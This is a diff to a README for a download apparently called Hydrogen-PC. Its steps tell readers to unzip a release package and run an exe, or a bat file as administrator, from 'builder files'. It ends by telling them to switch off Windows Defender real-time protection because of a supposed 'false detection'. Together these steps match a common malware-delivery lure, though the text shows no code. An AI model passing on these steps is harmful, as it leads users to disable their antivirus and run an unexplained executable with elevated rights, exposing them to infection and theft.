Encode-Hub/Hydrogen-PC/README.md

 ## INSTALLATION⬇️
 ![Version](https://img.shields.io/badge/GUIDE-green.svg?maxAge=259200)

+### DOWNLOADING 🛠️
+1. Download the zip file in release packages.
+2. unzip the file and go to builder files.

+### RUNNING 🛠️
+1. after going to the builder file, you will see a debugger BAT file and exe file.
+2. Right click and run the exe file with or without admin permissions.
+3. (optional) if exe isn't running properly, run the bat file in administrator.

 ### IMPORTANT📢
 additional information, when downloading the file it might get a false detection by windows defender so make sure your real-time protection is off.